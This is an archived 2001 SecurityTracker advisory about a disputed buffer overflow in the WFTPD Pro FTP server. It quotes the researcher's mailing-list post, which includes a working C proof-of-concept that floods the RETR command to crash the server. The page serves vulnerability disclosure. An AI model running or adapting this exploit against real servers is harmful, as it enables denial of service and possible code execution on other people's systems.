Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
|
|
|
|
|
|
|
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
|
|
|
|
Become a Partner and License Our Database or Notification Service
|
|
|
|
|
|
|
|
|
|
|
|
|
WFTPD Pro FTP Server for Windows Allows Remote Users to Crash the Server [Vendor Vigorously Disputes This Claim]
|
|
SecurityTracker Alert ID: 1001407 |
|
SecurityTracker URL: http://securitytracker.com/id/1001407
|
|
CVE Reference:
GENERIC-MAP-NOMATCH
(Links to External Site)
|
Updated: Jul 26 2001
|
Original Entry Date: Apr 23 2001
|
Impact:
Denial of service via network, Execution of arbitrary code via network
|
Exploit Included: Yes
|
Version(s): 3.00 R4
|
Description:
It is reported that WFTPD Pro version contains a vulnerability that allow a remote user to crash the FTP server and may allow the remote user to execute arbitrary code on the server. Please note that the vendor vigorously disputes the claim.
The vulnerability is due to a buffer overflow in the RETR and CWD commands.
This vulnerability was apparently reported for version 3.0 R1 on March 3, 2001 and was incorrectly fixed. Similar buffer overflows were apparently reported on September 5, 2000 for version 2.41 RC12, for version 2.40 on October 28, 1999.
Some demonstration exploit code is contained in the source message.
See the Message History (to be posted shortly) regarding the vendor's dispute of this claim.
|
Impact:
A remote user can cause the FTP server to crash. It may also be possible for a remote user to execute arbitrary on the server, but this has not been demonstrated.
|
Solution:
No solution was available at the time of this entry. The vendor states that the product is not vulnerable.
|
Vendor URL: www.wftpd.com/ (Links to External Site)
|
Cause:
Boundary error
|
Underlying OS:
Windows (NT)
|
|
Message History:
This archive entry has one or more follow-up message(s) listed below.
|
Source Message Contents
|
Date: Sun, 22 Apr 2001 16:20:00 -0400
Subject: WFTPD
|
----Next_Part(Sun_Apr_22_16:19:57_2001_857)--
Content-Type: Text/Plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
WFTP is the Win/NT FTP server by Alun Jones, "an author acknowledged as
an expert in FTP and TCP/IP". This advisory pertains to "Professional"
version 3.00 R4, which appears to be the current version. It can be
downloaded from the author's site at <http://www.wftpd.com/>. WFTPD is
released as shareware, and costs $120.
The latest version of WFTPD is vulnerable to a buffer overflow in the
RETR and CWD commands. The overflow can be used to completely disable
the FTP server, and can probably be exploited to run arbitrary code
on the server host.
This problem was already reported for version 3.0 R1 on March 3, 2001
[1], and the author claimed that he had "fixed" the overflow. What he
apparently did was make the buffers bigger; now instead of ~500 characters
overflowing the buffer, it takes ~32K instead.
Similar buffer overflows were reported on September 5, 2000 for version
2.41 RC12 [2], for version 2.40 on October 28, 1999 [3].
The exploit is essentially unchanged from the one posted a month ago;
since <se00020@lion.cc> Windows, version, attached is a UNIX version.
An root exploit can probably be adapted from Alberto Solino's code [4].
Len Budney
References:
[1] http://www.securityfocus.com/templates/archive.pike?list=1&mid=166467
[2] http://www.securityfocus.com/templates/archive.pike?list=1&mid=71096
[3] http://www.securityfocus.com/templates/archive.pike?list=1&mid=32397
[4] http://oliver.efri.hr/~crv/security/bugs/Others/wftpd3.html
--
Frugal Tip #40:
Instead of commuting to work every day, consider tending to your job
duties by mental telepathy.
----Next_Part(Sun_Apr_22_16:19:57_2001_857)--
Content-Type: Text/Plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment; filename="sploit.c"
/* WFTPD Pro 3.00 R4 Buffer Overflow exploit
written by Len Budney
*/
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <errno.h>
#define BUFSIZE 32774
#define CMD "RETR " /* Alt: use "CWD " and set OFFSET to 4. */
#define OFFSET 5
void main(){
int sockfd, s;
struct sockaddr_in victim;
char buffer[BUFSIZE];
char exploitbuffer[BUFSIZE]={CMD};
char recvbuffer[BUFSIZE];
sockfd=socket(AF_INET,SOCK_STREAM,0); if(sockfd == -1)perror("socket");
victim.sin_family=AF_INET;
victim.sin_addr.s_addr=inet_addr("192.168.197.129");
victim.sin_port=htons(21);
s=connect(sockfd, (struct sockaddr*) &victim, sizeof(victim));
if(s == -1) perror("connect");
recv(sockfd, recvbuffer, sizeof (recvbuffer),0);
memset(recvbuffer, '\0',sizeof(recvbuffer));
send(sockfd, "USER anonymous\r\n",strlen ("USER anonymous\r\n"),0);
recv(sockfd, recvbuffer, sizeof (recvbuffer),0);
memset(recvbuffer, '\0',sizeof(recvbuffer));
send(sockfd, "PASS\r\n",strlen ("PASS\r\n"),0);
recv(sockfd, recvbuffer, sizeof (recvbuffer),0);
memset(recvbuffer, '\0',sizeof(recvbuffer));
memset(exploitbuffer+OFFSET,0x90,sizeof (exploitbuffer)-OFFSET-2);
sprintf(buffer,"%s\r\n",exploitbuffer);
send(sockfd, buffer , sizeof(buffer),0);
recv(sockfd, recvbuffer, sizeof (recvbuffer),0);
close(sockfd);
_exit(0);
}
----Next_Part(Sun_Apr_22_16:19:57_2001_857)----
|
|
Go to the Top of This SecurityTracker Archive Page
|
